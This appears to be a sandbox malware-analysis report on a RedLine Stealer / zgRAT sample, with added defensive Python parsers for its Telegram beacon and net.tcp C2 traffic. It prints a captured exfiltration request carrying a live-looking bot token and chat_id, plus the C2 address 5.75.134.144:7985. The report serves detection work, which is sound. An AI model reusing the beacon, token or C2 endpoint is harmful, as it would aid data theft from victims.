Windows Analysis Report
SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Analysis ID: 854232
MD5: fffbb8afb4ca73ec2063d73427c847fe
SHA1: 965e02f47384c64307890e315b8ac9e72d6b9cb5
SHA256: 20e37644d93e86bec12b2c23abc6d0089ba83494189047f137fc19890c82d1fc
Tags: exe

Detection

RedLine, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Snort IDS alert for network traffic
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Name: RedLine Stealer
Description: RedLine Stealer is a malware sold on underground forums, apparently as a standalone purchase ($100/$150 depending on the version) or on a subscription basis ($100/month). It harvests information from browsers such as saved credentials, autocomplete data and credit card information. A system inventory is also taken on the target machine, including the username, location data, hardware configuration and details of installed security software. More recent versions added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted, and the malware can upload and download files, execute commands and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: zgRAT
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection

Source: InstallUtil.exe.6844.5.memstrmin Malware Configuration Extractor: RedLine {"C2 url": "5.75.134.144:7985"}
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.1496.0.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5726741061:AAElVs4Kh5cFjADvNi4pSC5O6l_EdthxhCY/sendMessage"}
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe ReversingLabs: Detection: 27%
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Virustotal: Detection: 28%
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Joe Sandbox ML: detected
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.2c00000.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49696 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: .pdb source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp

Networking

Source: Traffic Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.5:49697 -> 5.75.134.144:7985
Source: unknown DNS query: name: api.telegram.org
Source: Malware configuration extractor URLs: 5.75.134.144:7985
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected:
GET /bot5726741061:AAElVs4Kh5cFjADvNi4pSC5O6l_EdthxhCY/sendMessage?chat_id=5701072641&text=%0D%0A%F0%9F%94%8A%20*NEW%20EXECUTION*%0D%0A1%EF%B8%8F%E2%83%A3%20User%20=%20user%0D%0A2%EF%B8%8F%E2%83%A3%20Date%20UTC%20=%204/26/2023%204:39:15%20PM%0D%0A3%EF%B8%8F%E2%83%A3%20File%20=%20SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe%0D%0A HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
URL-decoded text parameter (one line per field): "🔊 *NEW EXECUTION*", "1️⃣ User = user", "2️⃣ Date UTC = 4/26/2023 4:39:15 PM", "3️⃣ File = SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe". The bot token in the request path and chat_id 5701072641 identify the operator's Telegram bot and channel; no User-Agent header is sent.
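The Telegram beacon above is the most actionable artifact in this report: the bot token and chat_id are operator-controlled identifiers that survive re-packing of the sample. The following parser is an added example (not part of the Joe Sandbox report or of the malware) that takes the captured request as a constructed raw HTTP string, checks that it is a Bot API call, and extracts the token, chat_id, the decoded "key = value" fields and the missing User-Agent that the "HTTP GET or POST without a user agent" signature refers to. Field names are recovered by stripping the leading keycap emoji; the message layout is assumed to be exactly the one captured here.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the GET captured in this report, re-assembled as the raw
# request with its header lines separated (the report shows them run together).
SAMPLE_REQUEST = (
    "GET /bot5726741061:AAElVs4Kh5cFjADvNi4pSC5O6l_EdthxhCY/sendMessage"
    "?chat_id=5701072641&text=%0D%0A%F0%9F%94%8A%20*NEW%20EXECUTION*%0D%0A"
    "1%EF%B8%8F%E2%83%A3%20User%20=%20user%0D%0A"
    "2%EF%B8%8F%E2%83%A3%20Date%20UTC%20=%204/26/2023%204:39:15%20PM%0D%0A"
    "3%EF%B8%8F%E2%83%A3%20File%20=%20SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe%0D%0A"
    " HTTP/1.1\r\nHost: api.telegram.org\r\nConnection: Keep-Alive\r\n\r\n"
)

# Telegram Bot API path: /bot<numeric id>:<secret>/<method>
BOT_PATH = re.compile(r"^/bot(?P<token>\d+:[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)$")


def parse_telegram_beacon(raw):
    """Return IOCs from a Telegram Bot API request, or None if it is not one."""
    request_line, _, rest = raw.partition("\r\n")
    parts = request_line.split(" ")
    if len(parts) != 3:
        return None
    http_method, target, _version = parts

    headers = {}
    for line in rest.split("\r\n"):
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    if headers.get("host") != "api.telegram.org":
        return None

    url = urlsplit(target)
    m = BOT_PATH.match(url.path)
    if not m:
        return None
    qs = parse_qs(url.query)  # percent-decodes values, so %0D%0A becomes CRLF

    # The stealer sends one "<keycap emoji> Key = value" per line; keep the
    # parseable ones and drop the decorative prefix from each key.
    fields = {}
    for line in qs.get("text", [""])[0].splitlines():
        if " = " in line:
            k, v = line.split(" = ", 1)
            fields[re.sub(r"^[^A-Za-z]+", "", k).strip()] = v.strip()

    token = m.group("token")
    return {
        "bot_token": token,
        "bot_id": token.split(":")[0],
        "api_method": m.group("method"),
        "chat_id": qs.get("chat_id", [None])[0],
        "http_method": http_method,
        "fields": fields,
        "missing_user_agent": "user-agent" not in headers,
    }


if __name__ == "__main__":
    for k, v in parse_telegram_beacon(SAMPLE_REQUEST).items():
        print(f"{k}: {v}")
```

The token is a credential for the operator's bot, so treat it like any other leaked secret: block or alert on `api.telegram.org` requests whose path matches `/bot<id>:<secret>/` from hosts that have no business using the Bot API, and hunt on the bot_id across proxy logs.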
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: global traffic TCP traffic: 192.168.2.5:49697 -> 5.75.134.144:7985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144 (this finding is repeated 50 times in the original report, one per connection to the hard-coded C2 IP)
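RedLine's C2 channel is a WCF net.tcp endpoint, which is why the Snort hit is named "net.tcp Init" and why the InstallUtil.exe memory dump in this report is full of WS-Trust, WS-SecureConversation and WSS namespace strings (System.ServiceModel constants loaded into the injected process). The client opens every session with a .NET Message Framing (MC-NMF) preamble: a version record (00 01 00), a mode record, a via record carrying the `net.tcp://host:port/` URI, a known-encoding record and a preamble-end record. The code below is an added example, not the report's or the ET rule's content: it builds a constructed preamble for the C2 in this report's configuration using the public MC-NMF layout (the duplex mode and binary-with-dictionary encoding are assumptions about what a NetTcpBinding client sends), parses it back, and applies simple heuristics a detection engineer might layer on top of the IDS alert.

```python
import ipaddress
from urllib.parse import urlsplit

# MC-NMF record types that appear in a net.tcp client preamble.
REC_VERSION, REC_MODE, REC_VIA, REC_KNOWN_ENCODING, REC_PREAMBLE_END = 0x00, 0x01, 0x02, 0x03, 0x0C
MODES = {0x01: "singleton-unsized", 0x02: "duplex", 0x03: "simplex", 0x04: "singleton-sized"}
DEFAULT_NET_TCP_PORT = 808  # port used by the Net.Tcp Port Sharing Service


def encode_size(n):
    """MC-NMF variable-length size: 7 bits per byte, low bits first, high bit set = more bytes."""
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        out.append(b | 0x80 if n else b)
        if not n:
            return bytes(out)


def decode_size(buf, pos):
    """Inverse of encode_size; returns (value, position after the size field)."""
    n = shift = 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated size field")
        b = buf[pos]
        pos += 1
        n |= (b & 0x7F) << shift
        if not b & 0x80:
            return n, pos
        shift += 7


def build_preamble(via, mode=0x02, encoding=0x08):
    """Constructed client preamble: Version(1.0), Mode, Via, KnownEncoding, PreambleEnd."""
    uri = via.encode("utf-8")
    return (bytes([REC_VERSION, 0x01, 0x00, REC_MODE, mode, REC_VIA]) + encode_size(len(uri)) + uri
            + bytes([REC_KNOWN_ENCODING, encoding, REC_PREAMBLE_END]))


def parse_preamble(buf):
    """Parse the start of a TCP payload; None unless it is an MC-NMF 1.0 client preamble."""
    if len(buf) < 8 or buf[:3] != b"\x00\x01\x00" or buf[3] != REC_MODE or buf[5] != REC_VIA:
        return None
    try:
        length, pos = decode_size(buf, 6)
    except ValueError:
        return None
    if pos + length > len(buf):
        return None
    via = buf[pos:pos + length].decode("utf-8", errors="replace")
    pos += length
    encoding = buf[pos + 1] if pos + 1 < len(buf) and buf[pos] == REC_KNOWN_ENCODING else None
    return {"mode": MODES.get(buf[4], hex(buf[4])), "via": via, "encoding": encoding}


def suspicious_indicators(buf):
    """Heuristics on top of the framing parse; an empty list means 'not a net.tcp preamble'."""
    p = parse_preamble(buf)
    if p is None or not p["via"].startswith("net.tcp://"):
        return []
    u = urlsplit(p["via"])
    reasons = ["net.tcp preamble"]
    try:
        if ipaddress.ip_address(u.hostname).is_global:
            reasons.append("via host is a literal public IP")
    except ValueError:
        pass  # a hostname rather than an IP literal
    if u.port not in (None, DEFAULT_NET_TCP_PORT):
        reasons.append(f"non-default net.tcp port {u.port}")
    if p["mode"] == "duplex":
        reasons.append("duplex session (server can push commands)")
    return reasons


if __name__ == "__main__":
    # Constructed packet for the C2 endpoint found in this report's RedLine config.
    pkt = build_preamble("net.tcp://5.75.134.144:7985/")
    print(pkt.hex(" "))
    print(parse_preamble(pkt))
    print(suspicious_indicators(pkt))
```

Legitimate WCF traffic inside an enterprise normally goes to a hostname, usually on port 808 or behind HTTP; a raw public IP on a high port with a duplex session is the combination the ET signature is effectively keying on, and the parsed `via` gives you the exact C2 string to pivot on.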
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.0000000005958000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.441415964.00000000010EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
